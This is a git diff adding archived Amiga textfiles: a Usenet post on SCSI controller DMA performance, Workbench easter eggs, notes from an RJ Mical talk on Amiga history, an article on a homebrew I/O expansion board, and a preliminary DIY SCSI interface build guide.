number of SCSI blocks, and then the DMA controller takes over. When the FIFO is near full, it requests the bus, transfers data at full speed, and then gives the bus back when the FIFO empties until the FIFO is near full again. The actual data gets into memory not much differently than the buffered CPU copy approach (eg, no wait states), but for the same amount of data transferred, the DMA device uses 1/2 the bus time. The other 1/2 is available to the CPU, so CPU work actually gets done during the transfer, even if waiting is required. A2090[a], A2091, A3000, and Microbotics Hardframe work this way (the A3000 DMA controller, by the way, runs at around 20 MB/s on a 25MHz A3000). + +>you win nothing because you have a whole lot of DMA going on already inside +>the system + +The other DMA in the system is a completely different kind of DMA. Hard disk controllers run on the Fast/Expansion bus just like the CPU, while "Amiga" DMA is this special slot-allocated bus sharing that only takes place on the Chip bus. The two are unrelated; in fact, as far as the Fast or Chip bus is concerned, there's no difference between CPU access or access by a DMA driven expansion device such as a hard disk controller. + +>and processor's running into heavy troubles sometimes, e.g. +>harddisk-performance is very low while using overscan-graphics (just to +>mention an example). + +The only case in which overscan-graphics cause a problem is in the case of the 2090[a] controllers. And this has nothing to do with DMA. The effect of overscan with many bitplanes on is to tie up the chip bus for long periods of time. If the CPU is trying to access Chip memory at this time, it gets wait stated and can do nothing until a retrace comes along. DMA or non-DMA, you have the same problem here -- getting the CPU away from waiting on Chip RAM, either by interrupt in the non-DMA case or by bus request in the DMA case. While the hard disk controller is waiting for CPU/bus access, there is still SCSI activity coming in. Unless your controller fully buffering, as in my third case, it must tell SCSI to stop sending data. The problem with the A2090[a] is that it didn't know how to do this. At least part of that problem was due to it's support of ST-506. At the time, ST-506 was the primary interface, SCSI was simply added because it was easy. ST-506 is slower than SCSI, and being a dumb interface, can't be stopped. So for whatever reasons, the A2090[a] controllers didn't know how to tell SCSI to stop sending when they couldn't get the bus fast enough, so they don't work well with heavy chip bus activity. This IS NOT a general problem with DMA! The A2091, A3000, Hardframe, and most likely any other DMA driven controller will work as well with overscan, if not better, than any non-DMA device. The manufacturers of non-DMA devices often try to mislead you by claiming "DMA problems" and implying they pertain to all DMA driven controllers, not just the A2090[a] (which, by the way, haven't been made for awhile). + +>well, how about "transfer rates up to 4MB/SEC synchronous" (gvp). in fact +>i have never understood this one. what do they mean? 4MBytes/sec? + +As I mentioned previously, asynchronous-mode SCSI transfers run at about 1.5 MB/s, tops. All SCSI devices out there run in asynchronous mode, and many don't handle synchronous mode. That's one of the reasons that the non-DMA controllers have managed, so far, to appear as fast or, parasitically, faster, than the DMA controllers -- as long as the SCSI transfers aren't faster than your transfer mechanism can handle, the speed of SCSI is the limiting factor. In synchronous mode, the SCSI bus uses a clock to coordinate the transfer, yielding potential transfers of 2 MB/s to 5 MB/s, depending on the clock. There's also a fast synchronous mode as part of the SCSI-2 spec which has a top speed of 10 MB/s. Synchronous won't make much difference in most single drive situations, anyway, since the raw speed of data coming off the disk is still around 1.25-1.5 MB/s, at best. But if you have multiple devices on the SCSI bus, and when faster devices are available, controllers that don't saturate the Amiga at 1.5 MB/s (eg, DMA controllers) will go noticably faster than non-DMA controllers. + +>i have never seen a controller/hd-combination reaching this. + +Like I said above, you probably won't. Just yet. And the raw SCSI transfer speed is only part of the equation -- your interrupt lag, device driver efficiency, system load, etc. all add to effective disk speed. + +>4MBits/sec = 512kBytes/sec. seems to be more like the truth, but is an +>absolutely ridiculous value + +No, it's 4 MegaBYTES per Second. That's trivial compared to the speed of the A3000's main bus or Zorro III bus, though not bad for the kind of peripheral bus SCSI is supposed to be. As I mentioned, the drives themselves are still catching up to this, and most A2000-class SCSI controllers are caught up short. The A3000 can hit around 1.2 MB/s through the filesystem with an asynchronous SCSI device, since it's fast DMA and fast bus arbitration are practically invisible when compared to the speed of SCSI. And keep in mind, while that DMA is happening, you're only using about 7.5% of the 3000's main bus bandwidth (a full speed synchronous SCSI could take 25% if it could be sustained). + +Dave Haynie Commodore-Amiga (Amiga 3000) "The Crew That Never Rests" +{uunet|pyramid|rutgers}!cbmvax!daveh PLINK: hazy BIX: hazy +Get that coffee outta my face, put a Margarita in its place! + + + +--------------------------- +Hidden Goodies in Workbench +--------------------------- + +1.x = hold both Shift & Alt keys + press & hold each of F keys in turn (different messages for each key) + Insert disk in & out of DF0: (bad or nice message on eject) + +2.x = click on Workbench window with Left button, + press & hold: Ctrl, both Alt, both Shift, + select any Workbench menu items with mouse, + release keys and choose ÒLast MessageÓ from menu (repeat each menu) + +3.x = 1. Boot Amiga. May have to shut down Workbench tools (AppIcons) + 2. Press and hold down Right mouse button. + 3. Press and hold down: Ctrl, left Shift, left Alt, right Shift, right Alt + 4. Select ÒAboutÓ from Workbench menu + 5. Move About window aside (donÕt close it), click on Workbench window + again, repeat from step 2. Within 15 tries, a different About box should open. If + not, you may have the Workbench.library open too may times. If so, reboot + without running startup-sequence, start Workbench with ÒLoadWBÓ and try + again. diff --git a/textfiles.com/computers/amihist.txt b/textfiles.com/computers/amihist.txt new file mode 100644 index 00000000..c8de18fa --- /dev/null +++ b/textfiles.com/computers/amihist.txt @@ -0,0 +1,400 @@ + On Monday March 2, RJ Mical (=RJ=) spoke at the Boston Computer Society +meeting in Cambridge. + + Fortunately I was momentarily possessed with an organizational passion, +and I took copious notes. I present them here filtered only through my +memory and my Ann Arbor. My comments are in [square brackets]. What +follows is a neutron-star-condensed version of about three and one half +hours of completely uninterrupted discussion. + + + +PART 1 - The Rise and Fall of Amiga Computer Inc. +==== === === ==== === ==== == ===== ======== ==== + + +The Early Days +--- ----- ---- + Amiga Computer Inc. had its beginnings, strangely enough, RJ began, with +the idea of three Florida doctors who had a spare $7 million to invest. +They thought of opening a department store franchise, but (as RJ said) they +wanted to try something a bit more exciting. So they decided to start a +computer company. "Yeah, that's it! A computer company! That's the +ticket! :-)" + + They found Jay Miner, who was then at Atari (boo hiss) and Dave Morse, +the VP of sales (you can see their orientation right off..) they lifted +>from Tonka Toys. The idea right from the start was to make the most killer +game box they could. That was it, and nothing more. However Jay and the +techies had other ideas. Fortunately they concealed them well, so the +upper management types still thought they were just getting a great game +machine. Of course the market for machines like that was hot hot hot in +1982... + + They got the name out of the thesaurus; they wanted to convey the +thought of friendliness, and Amiga was the first synonym in the list. The +fact that it came lexically before Apple didn't hurt any either, said RJ. + + However before they could get a machine out the door, they wanted to +establish a "market presence" which would give them an established name and +some distribution channels - keep thinking "game machine" - which they did +by selling peripherals and software that they bought the rights to from +other vendors. Principal among these was the Joyboard, a sort of joystick +that you stand on, and you sway and wiggle your hips to control the +switches under the base. They had a ski game of course, and some track & +field type games that they sold with this Joyboard. But one game the folks +at Amiga Inc. thought up themselves was the Zen Meditation game, where you +sat on the Joyboard and tried to remain perfectly motionless. This was +perfect relaxation from product development, as well as from the ski game. +And in fact, this is where the term Guru Meditation comes from; the only +way to keep sane when your machine crashes all the time is the ol' +Joyboard. The execs tried to get them to take out the Guru, but the early +developers, bless 'em, raised such a hue and cry they had to put it back in +right away. + + When RJ interviewed with Amiga Computer (he had been at Williams) in +July 1983, the retail price target for the Amiga was $400. Perfect for a +killer game machine. By the time he accepted three weeks later, the target +was up to $600 and rising fast. Partly this was due to the bottom dropping +completely out of the game market; the doctors and the execs knew they had +to have something more than just another game box to survive. That's when +the techies' foresight in designing in everything from disk controllers to +keyboard (yes, the original original Amiga had NO KEYBOARD), ports, and +disk drives began to pay off. + + The exciting part of the Amiga's development, in a way its adolescence, +that magical time of loss of innocence and exposure to the beauties and +cruelties of the real world, began as plans were made to introduce it, +secretly of course, at the winter CES on January 4th, 1984(?). + + +Adolescence +----------- + The software was done ten days before the CES, and running fine on the +simulators. Unfortunately when the hardware was finally powered up several +days later, (surprise) it didn't match its simulations. This hardware, of +course, was still not in silicon. The custom chips were in fact large +breadboards, placed vertically around a central core and wired together +round the edges like a Cray. Each of the three custom `chips' had one of +these towers, each one a mass of wires. According to RJ, the path leading +up to the first Amiga breadboard, with its roll-out antistatic flooring, +the antistatic walls just wide enough apart for one person to fit through +and all the signs saying Ground Thyself, made one think of nothing so much +as an altar to some technology god. + + After working feverishly right up to the opening minutes of the CES, +including most everybody working on Christmas, they had a working Amiga, +still in breadboard, at the show in the booth in a special enclosed gray +room, so they could give private demos. Unfortunately if you rode up the +exhibit-hall escalator and craned your neck, you could see into the room +>from the top. + + The Amiga was, RJ reminisced, the hardest he or most anyone there had +ever worked. "We worked with a great passion...my most cherished memory is +how much we cared about what we were doing. We had something to prove...a +real love for it. We created our own sense of family out there." + + After the first successful night of the CES, all the marketing guys got +dollar signs in their eyes because the Amiga made SUCH a splash even though +they were trying to keep it "secret." + + And so they took out all the technical staff for Italian food, everyone +got drunk and then they wandered back to the exhibit hall to work some more +on demos, quick bug fixes, features that didn't work, and so on. At CES +everyone worked about 20 hours a day, when they weren't eating or sleeping. + + RJ and Dale Luck were known as the "dancing fools" around the office +because they'd play really loud music and dance around during compiles to +stay awake. + + Late that night, in their drunken stupor, Dale and RJ put the finishing +touches on what would become the canonical Amiga demo, Boing. + + At last the true story is told. + + +Money Problems +----- -------- + After the CES, Amiga Inc. was very nearly broke and heavily in debt. It +had cost quite a bit more than the original $7 million to bring the Amiga +even that far, and lots more time and money were needed to bring it to the +market. Unfortunately the doctors wanted out, and wouldn't invest any +more. So outside funding was needed, and quick. + + The VP of Finance balanced things for a little while, and even though +they were $11 million in the hole they managed to pay off the longest- +standing debts and keep one step ahead of Chapter 11. After much +scrounging, they got enough money to take them to the June CES; for that +they had REAL WORKING SILICON. People kept peeking under the skirts of the +booth tables asking "Where's the REAL computer generating these displays?" + + Now money started flowing and interest was really being generated in the +media. And like most small companies, as soon as the money came in the +door it was spent. More people were added - hardware folks to optimize and +cost-reduce the design; software people to finish the OS. Even the sudden +influx of cash was only enough to keep them out of bankruptcy, though; they +were still broke and getting broker all the time. How much WOULD have been +enough? RJ said that if he were starting over, he'd need about $49 +million to take the machine from design idea to market. Of course Amiga +Inc. had nowhere near that much, and they were feeling the crunch. Every- +body tightened their belts and persevered somehow. They actually were at +one point so broke they couldn't meet their payroll; Dave Morse, the VP of +Sales, took out a second mortgage on his house to help cover it, but it +still wasn't enough. + + They knew they were going under, and unless they could find someone +quick to buy them out they were going to be looking for jobs very shortly. +They talked to Sony, to Apple, to Phillips and HP, Silicon Graphics (who +just wanted the chips) and even Sears. Finally...they called Atari. (Boo! +Hiss! [literally - the audience hissed at Jack Tramiel's name!]) Trying to +be discreet, RJ's only personal comment on Jack Tramiel was (and it took +him a while to formulate this sentence) "an interesting product of the +capitalist system." Ahem. Apparently Tramiel has been quoted as saying +"Business is War." Tramiel had recently left Commodore in a huff and +bought Atari "undercover" so that by the time he left C= he was already CEO +of Atari. + + Realizing that Commodore was coming out with their own hot game machine, +Tramiel figured he'd revenge himself on them for dumping him by buying +Amiga Inc. and driving C= down the tubes with "his" superior product. So +Atari gave them half a million just for negotiating for a month; that money +was gone in a day. + + Of course Tramiel saw that Amiga Inc. wasn't in a very good bargaining +position; basically unless they were bought they were on the street. So he +offered them 98 cents a share; Dave Morse held out for $2.00. But instead +of bargaining in good faith, every time Morse and Amiga tried to meet them +halfway their bid went down! + +"Okay, $1.50 a share. + No, we think we'll give you 80 cents. +How about $1.25? + 70 cents." + +And so on... + + Even Dave Morse, the staunchest believer in the concept that was the +Amiga, the guiding light who made everyone's hair stand on end when he +walked into the room, was getting depressed. Gloom set in. Things looked +grim. + + Then, just three days before the month deadline was up, Commodore +called. Two days later they bought Amiga Inc. for $4.25 a share. They +offered them $4.00, but Dave Morse TURNED THEM DOWN saying it wasn't +acceptable to his employees; he was on the verge of walking out when they +offered $4.25. He signed right then and there. + + +The Commodore Years +--- --------- ----- + Commodore gave them $27 million for development; they'd never seen that +much money in one place before. They went right out and bought a Sun +workstation for every software person, with Ethernet and disk servers and +everything. The excitement was back. + + Commodore did many good things for the Amiga; not only did they cost- +reduce it without losing much functionality, they had this concept of it as +a business machine; this was a very different attitude from what Amiga Inc. +had been working with. Because of that philosophy, they improved the +keyboard [ha! - garyo] and made lots of other little improvements that RJ +didn't elaborate on. + + What could Commodore have given them that they didn't? The one thing RJ +wanted most from them was an extra 18 months of development time. Unfortu- +nately Commodore wasn't exactly rich right then either, so they had to +bring out the product ASAP [and when is it ever any different?] Also, he +said, they could have MARKETED it. (applause!). If he'd had that extra 18 +months, he could have made Intuition a device rather than a separate kind +of thing; he could have released it much more bug-free. + + As far as marketing goes, the old ad agency has been fired; we should +see some new Amiga ads real soon now. + + +The Future +--- ------ + RJ's advice for A1000 owners: "Keep what you've got. It's not worth it +to trade up. The A1000 is really a better machine." + + This may be sour grapes on RJ's part, since the Amiga 2000 was designed +in Braunschweig, West Germany, and the version of the A2000 being worked on +in Los Gatos was rejected in favor of the Braunschweig-Commodore version. +However the A1000 compares to the A2000, though, the Los Gatos 2000 would +have certainly been better than either machine. C= management vetoed it +because Braunschweig promised a faster design turnaround (and, to their +credit, were much faster in execution than the Los Gatos group would have +been) and more cost-reduction, which was their specialty. Los Gatos, on +the other hand, wanted a dream machine with vastly expanded capabilities in +every facet of the machine. The cruel financial facts forced C= to go with +the Business Computer Group, who did the Sidecar in Braunschweig as well, +and quickly and cheaply. + + So they fired more than half the staff at the original Los Gatos +facility, one by one. That trauma was to some extent played out on the +net; no doubt many of you remember it as a very difficult and emotional +time. There are now only six people left in Los Gatos, and their lease +expires in March, so thus expires the original Amiga group. + + And that's how RJ ended his talk; the rise and fall of Amiga Computer +Inc. The future of the Amiga is now in the hands of Westchester and +Braunschweig, and who knows what direction it will take? + + + +PART 2 - Technical Questions From the Audience +==== === ========= ========= ==== === ======== + + + I'll just make this part a list of technical questions and answers, +since that was the format at the talk anyway. This part is part technical +inquiries and part total rumor mill; caveat emptor. + + Q's are from the audience, A's are =RJ=. + +............................................................................ + +Q: When is 1.3 coming and what's in it? + +A: 1.3 (or maybe it'll be called 1.2A) will be mostly just 1.2 with hard + disk boot; it'll look for Workbench on dh0: as well as df0:. + + No one is working on it right now, although there are people in West + Chester planning it. + + +Q: Can you do double buffering with Intuition? +A: Pop answer: No. Thought-out: well, yes, but it's not easy. Use + MenuVerify and don't change the display while menus are up. It's pretty + hairy. + + +Q: How big is intuition (source code)? +A: The listings (commented) are about a foot thick, 60 lpp, 1 inch margins. + + +Q: Where did MetaComCo come into the Amiga story? +A: MCC's AmigaDOS was a backup plan; the original Los Gatos-written + AmigaDOS was done with some co-developers who dropped out due to + contract and money hassles when C= bought Amiga. Then MCC had to crank + EXTREMELY hard to get their BCPL DOS into the system at the last + possible minute. + + +Q: Why isn't the Sidecar out? +A: Who knows? It passed FCC in December... + + +Q: Why no MMU? +A: Several reasons. Obviously, cost was a factor. MMUs available at the + time the Amiga was designed also consumed system time [this is what he + said- I'm just the scribe]; although newer MMUs solve this problem they + were too late for the Amiga. + + Second, the original goal of the Amiga was to be a killer game machine + with easy low-level access, and an MMU didn't seem necessary for a game + machine. + + Third [get this!] with an MMU, message-passing becomes MUCH MUCH hairier + and slower, since in the Amiga messages are passed by just passing a + pointer to someone else's memory. With protection, either public memory + would need to be done and system calls issued to allocate it, etc., or + the entire message would have to be passed. Yecch. So the lack of MMU + actually speeds up the basic operation of the Amiga several fold. + + +Q: Why no resource tracking? +A: The original AmigaDOS/Exec had resource tracking; it's a shame it died. + + +Q: How is your game coming? [??] +A: It's just now becoming a front-burner project. It's number crunch + intensive; hopefully it will even take over the PC part of the 2000 for + extra crunch. It's half action, half strategy; the 'creation' part is + done, only the playing part needs to be written. Next question. :-) + + +Q: Will there ever be an advanced version of the chip set? +A: Well, Jay Miner isn't working on anything right now... [RUMOR ALERT] + The chip folks left in Los Gatos who are losing their lease in March + were at one time thinking about 1k square 2meg chip space 128-color + graphics, although still with 4 bit color DACs though... and even stuff + like a blitter per plane (!!) They were supposed to be done now, in the + original plans; the chip designers will be gone in March, but the design + may (?) continue in West Chester. Maybe they'll be here two years from + now. + + +Q: What will happen to the unused Los Gatos A2000 design? +A: ?????? + + +Q: Should I upgrade from my 1000 to a 20 +00? +A: Probably not. The 2000 isn't enough better to justify the cost. Unless + you need the PC compatibility, RJ advocated staying with the 1000. + After all the 2000 doesn't have the nifty garage for the keyboard...:-) + The A1000 keyboard is better built; you can have kickstart on disk; it's + smaller and a LOT quieter, [maybe not than the old internal drives!!!] + and uses less power; the 2000 has no composite video out, plus the RGB + quality is a tad worse. Composite video (PAL or NTSC) is an extra-cost + option with the 2000. + + +Q: Have you ever seen a working Amiga-Live!? +A: Yes, I've seen it taking 32-color images at 16fps, and HAM pictures at + something like half that. [!!] It's all done and working. I don't know + why it's not out. It sure beats Digiview at 8 seconds per image! + + +Q: What do you use for Amiga development tools? +A: DPaint and Infominder, Aztec C, Andy Finkel's Microemacs. + +Q: What's the future of the A1000? +A: They aren't making any right now; they're just shipping from stock. But + they do claim that they intend to continue making them. + + +Q: Is MetaComCo's stuff all really slow, or what? :-) +A: Yes, it is slow. But don't knock it, it works. + + +Q: Who is the competition for Amiga right now? +A: The new Macs are so expensive, they're not a threat to the 2000, much + less the 1000. Atari's new stuff "doesn't impress me." [that's all he + said.] + + +Q: What can I do about lack of Amiga ads, and the quality of the ones that + do exist? +A: Write (don't call) Clive Smith in Marketing at Westchester and tell him + they need better ads. + + +Q: Why are the pixels 10% higher than wide? +A: The hardware came out that way, and it would have been a pain to do it + any other way due to sync-rate-multiple timing constraints. + + +[that's all folks!] + +=========================================================================== + +The preceding tome was produced entirely by placing my terminal cable just +next to the microwave on high and wiggling it around like !*(&t%*h5i@!s, so +don't take any of it too seriously. :-) + + Gary Oberbrunner + +-- +Remember, -Truth is not beauty; +Information is not knowledge; / Beauty is not love; Gary Oberbrunner +Knowledge is not wisdom; / Love is not music; ...!masscomp!garyo +Wisdom is not truth; ----/ Music is the best. - FZ + +-- +--------------------------- Signature Version 1.2 --------------------------- +| bear@bu-pub.bu.edu enge05c@buacca.bu.edu | +| | +| "Love is like oxygen. You get too much, you get too high. | +| Not enough and you're gonna die. Love gets you high." | +----------------------------------------------------------------------------- diff --git a/textfiles.com/computers/amiport.txt b/textfiles.com/computers/amiport.txt new file mode 100644 index 00000000..1abe6e56 --- /dev/null +++ b/textfiles.com/computers/amiport.txt @@ -0,0 +1,203 @@ +The following is an excerpt from an article scheduled to appear in the +February 1991 issue of Amazing Computing. Please refer to that article for +more information about the I/O Board as well as ordering information. -JL + +Happy Holidays! +============================================================================= + +12 December 1990 + + More Ports for Your Amiga + + An I/O Expansion board + +by Jeff Lavin +Copyright )1990 The Puzzle Factory + +Many of you in the Amiga community have built Brad Fowles' excellent "LUCAS" +accelerator board, which introduced the idea of "Public Domain Hardware". In +this article I will present another public domain hardware project for the +Amiga, which will enable you to add two parallel ports and two serial ports +to your Amiga 500, 1000 or 2000 for $70. Furthermore, you can easily and +inexpensively upgrade to four parallel ports and/or four serial ports at any +time. + +The hardware consists of a small printed circuit board with a 40 pin cable +and DIP jumper that plugs into the socket occupied by CIA B, and a small pcb +that contains the serial interface. CIA B is physically moved onto the I/O +Expansion board. + +This hardware supports 15 standard baud rates, from 50 to 38,400 baud, plus +MIDI (31,250 baud). It also supports full hardware handshaking. Up to four +units may be open at one time, although the cpu may not be able to keep up +with all four units running above 2400 baud. + + +Raison d'etre +============= +As a hardware hacker of long standing, I have a number of small computers +with all sorts of hardware attached to them, from extra ports to EPROM prog- +rammers, and longed to do the same with the Amiga. Since the Amiga uses a +pair of 8520's (actually 6526's) for its I/O, I figured it would be a piece +of cake to add more 65/68XX family peripheral chips and be up and running. +The only problem was that, because there is no obvious chip select decoding, +I could never figure out how the 8520's were addressed. One day a friend +came by, and we were able to figure out that the I/O chips are +"automatically" selected when certain addresses are generated by logic hidden +in the PALS. Now that the final piece of the puzzle was in place, I wasted +no time and had a prototype in my Amiga in two weeks. + + +How it works +============ +This hardware hack is possible because of two things the designers of the +Amiga did for us: + + 1. The address space where the CIAs live is incompletely decoded. This + means the 16 CIA registers are echoed repeatedly over a large range. + + 2. The locations where software is supposed to address the CIA registers + is completely specified over a much smaller range. + +These two facts make it possible for us to take the chip select from one CIA, +and divide it into four parts. The addresses in the upper part are routed to +the CIA normally, and we "steal" the addresses from the remainder of the +space for our own use. Because the "hard" part, most of the address decoding +and the bus timing, has been done for us, we can get away with nothing more +complicated than an additional address decoder to split off our address space. + +Unfortunately, this hack is not possible on the A3000 for the same reason +that it is possible on earlier Amigas. The address decoding on the A3000 is +complete; there are no "extra" incompletely decoded addresses to "steal". + +The VIA and ACIA registers are still echoed over a pretty wide address range. +We have specified where to address them for the same reason that Commodore +has specified addresses for the CIAs: to ensure software compatibility. We +would very much like to see enough people build these boards to create an +installed software base. So programmers, please use these addresses when you +are writing all those neat multi-line BBS programs and multi-user +applications, as well as process control programs, robotics demos, etc. + + +Software +======== +Of course, hardware is next to useless without software to drive it. This +section describes the software available for the I/O Expansion Board. + +The Serial Driver +----------------- +Almost all programs written for the Amiga that use the serial port (with the +notable exception of some MIDI software) access it indirectly via a standard +software module called "serial.device". As a result, most existing software +will work fine with the I/O Board given a suitable driver, and we supply one, +named "newser.device". Simply copy it to your "DEVS:" directory and you're +in business. Most programs will permit you to change the device name (from +serial.device to newser.device) as well as the unit number (indicating which +port is to be used), or you may use the supplied IOpatch utility, described +below (see "Support Programs"). It is worth noting that, as with all other +programs relating to the I/O Board, we supply complete assembly language +source code of the driver. If you encounter a problem - and all else fails - +it's possible to fix it yourself. + +The Parallel Driver +------------------- +The four parallel ports on the I/O Expansion Board are controlled by the +eightbit.device. There are no known differences between this device and the +V1.3 parallel.device. Applications should not experience any problems +communicating with the eightbit.device on the device level. Full assembly +language source code of the driver is supplied with the I/O Expansion board. + +DOS-Level Support +----------------- +"DOS-level support" refers to the ability to get and send data via the serial +and parallel ports with standard AmigaDOS commands, such as TYPE or LIST, or +with any program that does serial or parallel I/O via AmigaDOS, rather than +directly via the Exec-level "newser.device" or "eightbit.device". Although +this sort of capability is not frequently used, it is useful from time to +time. + +In a perfect world, DOS-level support would mean nothing more than an +appropriate MountList entry, specifying a driver name of "newser.device" or +"eightbit.device", and some unit number of your choosing, corresponding to a +DOS name such as "SER1" or "PAR2". Unfortunately, Commodore supplied a +version of the Port-Handler and Aux-Handler with Workbench V1.3 that doesn't +permit this; rather, they're hard-coded to use either "serial.device" or +"parallel.device". The printer.device suffers from a similar limitation. At +the time of this writing, we don't have a solution, other than using IOpatch. +However, we expect to have replacement handlers ready by the time you read +this. In addition, the handlers in Workbench V2.0 have the capability to use +any device and unit, so this whole problem is non-existent if you have V2.0. + + +Support Programs +---------------- +Several programs are available for use with the I/O Expansion Board. + +SERprefs functions much the same as the serial section of Preferences, but +allows you to set and save parameters for all four units of the +newser.device. These are saved in "S:Serial-Preferences". + +Many programs allow you to specify the device name and unit number, so that +using an alternate device driver is no problem. For those applications that +insist on using a particular device, we have written a nice little hack +called IOpatch. This program SetFunction()s the exec OpenDevice call. The +user puts this program in his startup-sequence, or otherwise invokes it, +before he runs his application program. This patch will make a small window +appear, whenever OpenDevice() is called, with a choice of units; 0-4. Unit 0 +will select the internal serial or parallel port, and units 1-4 will select +one of the newser.device or eightbit.device units. Please note that the +names of both drivers have been selected to be the same length as the names +of the original devices. This has been done to facilitate file-zapping as a +last resort. Of course, software may be written for the newser.device or +eightbit.device initially. + +A suite of simple test programs to check the I/O Expansion Board Hardware can +save you hours of hardware debugging time. Chip selects, as well as read and +write signals, are generated for all chips. One program simulates a very +simple character-oriented terminal program for checking an ACIA. + +A nice little program to drive a real-time clock-calendar is also available. +The clock hardware, based on the OKI MSM5832, is capable of generating +interrupts at 1024 hz, once per second, once per minute, or hourly. Software +to take advantage of this feature is left as an exercize for the student. + + +Credits +======= +I would like to thank Dan Babcock for the many hours he put in writing and +debugging the serial device driver. This was surely one of the most +difficult parts of this project. Paul Coward, of DigiSoft, provided us with +the parallel device driver, no small achievement either. Jim Cooper, of The +Software Distillery, made many helpful suggestions concerning software +issues, and especially DOS compatibility, and helped us get up to speed. +Bill Seymour provided invaluable help in layout and pre-production of the +PCBs, and also provided design help. Finally, this task was made easier by +the help and encouragment of Doug Sears and Grace Lavin. + + +Conclusion +========== +I think this is a pretty neat little hack. I also feel that it is simple +enough that if I hadn't come up with it, someone else would have. It +provides some much-needed additional I/O for the Amiga 1000 or 2000 at a +rock-bottom price. If enough software becomes available to warrant it, I +will try to set up some sort of software clearing house for use with this +board. Keep an eye on BIX or my BBS, The Symposium, for any news. +Meanwhile, I hope you enjoy using this board. And don't let the blue smoke +out! +============================================================================= + +If you need to get in touch with me, here are some possibilities: + + BIX jblavin + USENET jlavin@cie.uoregon.edu + The Symposium My own BBS, (503) 935-7883, 24hrs, F8N1 + + The Puzzle Factory + P.O. Box 986 + Veneta, OR 97487 + (503) 935-3709 +The Puzzle Factory, Inc. | Jeff Lavin -- jlavin@cie.uoregon.edu +Veneta, Oregon |------------------------------------- +Voice : (503) 935-3709 | Remainder of signature line +Data : (503) 935-7883 | under construction. diff --git a/textfiles.com/computers/amscsi.txt b/textfiles.com/computers/amscsi.txt new file mode 100644 index 00000000..0bceccbd --- /dev/null +++ b/textfiles.com/computers/amscsi.txt @@ -0,0 +1,136 @@ + SCSI CONTROLLER + + This is a very preliminary doc. for a SCSI interface for the AMIGA. + I know that it is fragmented, but I am trying to get something together + quickly. Feel free to send me your comments. + At the present time this design does not support DMA or AUTOCONFIG'ing. + The "net-list" also includes parts for an optional 2 meg. memory add-on. + At this time the memory does not work! I have to check my equations and + analize that section of the board. The memory section does NOT upset the + AMIGA or the SCSI interface. There are no special considerations when + building the board. It runs off of the AMIGA's power supply and plugs + into the EXPANSION PORT . + The board uses 1 special part: NCR53C80 (sorry about that.) + I used it because it handles most of the SCSI interface, and eliminates + alot of "LS" chips. (The NCR53C80 is the CMOS version of the SCSI + controller used by APPLE and most other venders!) + + Building the board + +WARNING ! This board plugs into the expansion port! That port is directly +connected to the CPU and other chips in your AMIGA. Care must be taken so +as not to short anything to +5v or gnd as that may DESTROY your AMIGA. + The circuit and design concepts are sound, but YOU are in control of +your machines destiny. This project is NOT for the casual hacker. +REMEMBER, Don't yell at me if you break your machine!!! + + On the lighter side, my board worked the first time it was turned on. +It must be easy if I didn't make any errors... Just take your time and all +will be OK ! + + +After deciding where to locate all of the parts, use the "net-list" to +wire it. I suggest doing all of the wiring to the board before installing +the IC's. Remember that the NCR53C80 is sensitive to static, so be careful. +Also before installing IC's it is a good practice to check the power and +gruond pins on all chip sockets. + + PARTS LIST + PART# LOC USE + 74LS688 ....................... Z1 ......... ADDRESS DECODER + 74LS139 ....................... Z2 ......... ADDRESS & R/W DECODER + NCR53C80 ...................... Z3 ......... SCSI INTERFACE + 7406 .......................... Z4 ......... INTERRUPT BUFFER + 74LS244 .................... Z6 Z7 Z8 ...... MEMORY ADD. MUX + PAL20RA10 ..................... Z5 ......... MEMORY CTRL PAL + AMIGA CONNECTOR ............... P1 ......... 86 PIN + SCSI CONNECTOR ................ P2 ......... 50 PIN + MEMORY CONNECTOR .............. P3 ......... 60 PIN + +NOTE: DO NOT INSTALL U4,U5,U6,U7,U8 AT THIS TIME. + If you want to wire it, go ahead the DRAM will be comming soon! + + CIRCUIT DESCRIPTION + The reason for the 74LS688 (8 bit comparitor) is to allow for upgrading +the board for AUTOCONFIG'ing. I don't plan to do this until I get the +important work done (DRAM & CLOCK). It is not hard to use this way, +you have to "install" the board anyway. The advantage of AUTOCONFIG +is that the AMIGA decides where in the memory the board resides. +This is not a problem since it is the only board in the system..... + The PAL (Z5) is used to control the DRAM. It is not needed at this point +so don"t worry about it. +The 'LS139 is used to decode addresses intofour 16K blocks. + 1: $800000 is the NCR53C80 + 2: $801000 is the PSEUDO DMA + 3: $802000 is for the CLOCK (not done yet) + 4: $803000 is not used at this point + It may seem like alot of wasted memory but the AMIGA can only +AUTOCONFIG in 64K blocks. + The second half of the 'LS139 is used to convert the R/W signal +of the 680x0 to the read & write lines used by the NCR53C80. + Z4 -the 7406 will be used as the interrupt driver. I want to +use INT2* for the NCR's interrupts and INT6* for the DRQ*. DON'T +install the 7406 untill the real driver is available. Your AMIGA +won't like getting interrupted by the NCR53C80! + That is all there is to the SCSI interface. (Atleast for now) +It is possible to add DMA capibilities to the board but lets get the +thing up and running first! + + + READING THE "NET-LIST" + The schematic "AMSCSI" was made on an IBM XT using Future-Net software. +I wish that someone had a good schmatic capture pgm for the AMIGA ! +Anyway to wire a board from the "net-list" ignore the "Path Ref" & + the "Symbol Ref" cols. + + EXAMPLE: Part of the net-list + +Signal Desc Path Ref Circuit Designator Symbol Ref Pin +-------------------------------------------------------------------------------- + IGNORE PART# IGNORE PIN # + THIS THIS + COL. COL. +1,(AS) (This is the signal name) + 1-1 P1 (part #) 195 74 (pin) + 1-1 Z1 191 1 + 1-1 Z5 196 6 + +1,(C1) + 1-1 P1 195 16 + 1-1 Z5 196 2 + +1,(C3) + 1-1 P1 195 14 + 1-1 Z5 196 3 + + The signal (AS) should be wired from pin 74 of P1 to Z1 pin 1 and +Z5 pin 6 + The signal (C1) should be wired from pin 16 of P1 to Z5 pin 2 + + Continue this for the rest of the net list. EASY ISN'T IT. + + It is recommended that the SCSI bus be terminated with 220 ohm / 330 ohm +resistors. These are not included on the "net-list". Every SCSI signal +should have a 220 ohm resistor to +5v, and a 330 ohm resistor to gnd. + You might want to try it without the terminators, but leave room for them +just to be safe.......... + + When I get a chance I will make a schematic on Dpaint. + +I have included two BASIC programs that will help you test your board. + 1: SCSIMon - a small monitor that constantly reads the NCR53C80 + and desplays the reg.s in HEX + 2: SCSIdvr - a very crude program that "PEEKS & POKES" the + SCSI . With it you can FORMAT, READ, & WRITE + a hard disk. It takes about 10-20 sec to read, + or write 1 sector !! ( Not blazing speed is it?) + +I hope to have an assembly (source) language program in the near future. + It is called------- SCSI68K.asm +If anyone can help with the DRIVER, PLEASE, let me know! + + 